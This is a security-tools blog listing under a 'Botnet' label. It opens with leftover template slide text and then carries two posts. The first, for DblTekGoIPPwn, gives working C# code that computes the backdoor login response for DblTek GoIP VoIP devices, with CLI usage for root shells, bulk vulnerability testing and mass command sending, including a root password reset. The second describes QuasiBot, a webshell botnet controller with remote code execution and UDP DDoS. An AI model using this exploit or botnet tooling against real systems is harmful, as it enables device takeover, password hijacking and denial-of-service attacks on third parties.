This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Botnet. Show all posts
Showing posts with label Botnet. Show all posts

DblTekGoIPPwn - Tool to check if an IP of a DblTek GoIP is vulnerable to a challenge-response login system, execute remote commands botnet style, and generate responses to challenges

March 29, 2017  , , , , , , , , , ,  


Tool to exploit challenge response system in vulnerable DblTek GoIP devices. Can generate responses to specified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, and drop into a root shell on any vulnerable host.

The Vulnerability
On March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek GoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named 'dbladm'. When a user entered this as their username in a telnet prompt, the system would present a challenge that when followed with the right response, gave the user a root shell on the system.
The problem with such a challenge response system is that the devices are as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this algorithm, a root shell can be aquired on ANY DblTek GoIP device.
Original Article: https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/
Using the description of the backdoor provided in the article, I was able to write what I believe to be some of the first exploit code for this vulnerability. The core of this is of course the algorithm to generate the response based on a given challenge. Here is a function to do this written in C#. 
static string ComputeResponse(string challengeStr)
{
    int challenge = Convert.ToInt32(challengeStr.Substring(1)); // Get just the number after 'N'.

    string modified = (challenge + 20139 + (challenge >> 3)).ToString(); // Perform some dummy 1337 operations.

    byte[] buffer = new byte[64];
    // Copy the string into the first part of the buffer.
    for (int i = 0; i < modified.Length; i++)
        buffer[i] = (byte)modified[i];

    var md5 = MD5.Create();
    byte[] hash = md5.ComputeHash(buffer); // Calculate the MD5 of the buffer.

    StringBuilder sb = new StringBuilder(); // Will hold the results.
    // Take the unpadded hex value of the first six bytes of the MD5.
    for (int i = 0; i < 6; i++)
        sb.Append(hash[i].ToString("x"));

    return sb.ToString(); // Profit
}

DblTekGoIPPwn Command Line Interface (CLI)
When DblTekPwn is ran without arguments, the help is displayed. This is the output: 
USAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]

[MODE]:
-c --compute-response [CHALLENGE]         Computes a response to the given challenge.
-r --root-shell                           Starts a root shell with the vulnerable host.
-s --send-commands    [COMMAND_FILE]      Sends commands from a file to vulnerable hosts.
-t --test                                 Tests hosts and determines if they are vulnerable.
-h --help                                 Displays this help and exits.

[HOSTS]:
-n --name             [IP]                Specifies a single IP address.
-f --file             [IP_FILE]           Specifies a file with IP\nIP\nIP.

[OUTPUT]:
-o --output           [OUTPUT_FILE]       Specifies an output file. Default stdin.

Examples

Getting a Root Shell on a Vulnerable System
DblTekGoIPPwn makes it easy to get a root shell on any vulnerable system. Simply run the following command using the vulnerable IP. 
DblTekPwn.exe --root-shell --name 192.168.1.1
You will see output that looks like this: 
Password: ***********
From here you can begin entering commands (there is no shell prompt).

Calculating a Challenge Response
Say you wanted to calculate the response to a GoIP challenge N1746203308 . You would just run the following command. 
DblTekPwn --compute-response N1746203308
The output will be the response: 
d6176d3aab2

Checking a List of IPs
Say you wished to check list.txt of IPs for GoIPs that are vulnerable and send this output to results.txt . First make sure that the IPs are in format ip:port (port is default 23) and that the IPs are seperated by a newline \n . The following command could then be ran. 
DblTekPwn.exe --test --file list.txt --output results.txt
list.txt: 
192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323
results.txt: 
192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False
The False or True after the host indicates whether or not the IP is vulnerable.

Sending Commands to a List of IPs
Say you had a list of commands (which is really a list of telnet inputs) in cmds.txt to send to list.txt of IPs and send the output to results.txt . First make sure that the IPs are in format ip:port (port is default 23) and that BOTH the IPs AND commands are seperated by a newline \n in their respective files. The following command could then be ran. 
DblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt
list.txt: 
192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323
cmds.txt: 
passwd root
toor
toor

exit
results.txt: 
192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False
The False or True after the host indicates whether or not the connection was successfully made and the commands delivered.


Read More

QuasiBot - Webshell Manager aka HTTP Botnet

July 30, 2014  , , , , , , ,  


QuasiBot is a complex webshell manager written in PHP, which operate on web-based backdoors implemented by user himself. Using prepared php backdoors, quasiBot will work as C&C trying to communicate with each backdoor. Tool goes beyond average web-shell managers, since it delivers useful functions for scanning, exploiting and so on. It is quasi-HTTP botnet, therefore it is called.

All data about bots is stored in SQL database, ATM only MySQL is supported. TOR proxy is also supported, the goal was to create secure connection between C&C and backdoors; using SOCKS5, it is able to torify all connections between you and web server. All configuration is stored in config file. QuasiBot it's still under construction so i am aware of any potential bugs.

You will need any web server software; tested on Linux, Apache 2.2 and PHP 5.4.4.

How it works?

  • quasiBot is operating on web-shells delivered by user, each backdoor is being verified by md5 hash which changes every hour
    quasiBot (C&C) -[request/verification]-> Bots (Webshells) -[response/verification]-> quasiBot (C&C) -[request/command]-> Bots (Webshells) -[response/execution]-> quasiBot (C&C)
  • Backdoors consists of two types, with and without DDoS module, source code is included and displayed in home page;
  • Connection between C&C and server is being supported by curl, TOR proxy is supported, User Agent is being randomized from an array
    quasiBot (C&C) -[PROXY/TOR]-> Bots (Webshells) <-[PROXY/TOR]- quasiBot (C&C)
  • Webshells can be removed and added at 'Settings' tab, they are stored in database
  • 'RSS' tab contain latest exploits and vulnerabilities feeds
  • 'RCE' tab allows to perform Remote Code Execution on specific server using selected PHP function
  • 'Scan' tab allows to resolve IP or URL and perform basic scan using nmap, dig and whois - useful in the phase of gathering information
  • 'Pwn' tab stands for few functions, which generally will help collect informations about server and try to find exploits for currently used OS version using Linux Exploit Suggestor
  • 'MySQL Manager', as the name says, can be used to perform basic operations on specific database - it could be helpful while looking for config files that include mysql connections on remote server; it also displays some informations about it's envoirment
  • 'Run' tab allows you to run specific command on every bots at once
  • 'DDoS' tab allows you to perform UDP DoS attacks using all bots or single one, expanded backdoor is required
  • Whole front-end is maintaned in a pleasant, functional interface

Running quasi for first time

  • Move all files to prepared directory, change default settings in config file (config.php)
  • Visiting quasiBot for the first time will create needed database and it's structure
  • In 'Settings' tab, you are able to add and delete shells, you're ready to go

Todo

  • Authorization system
  • Move Linux Exploit Suggestor to PHP language
  • Add Windows support to 'PWN' module
  • Automatic attacks on servers
  • Backdoors creation (backconnects)
  • Source code cleanup, it's still pretty shitty; amount of required files should be reduced
  • ???

Read More
Subscribe to: Posts (Atom)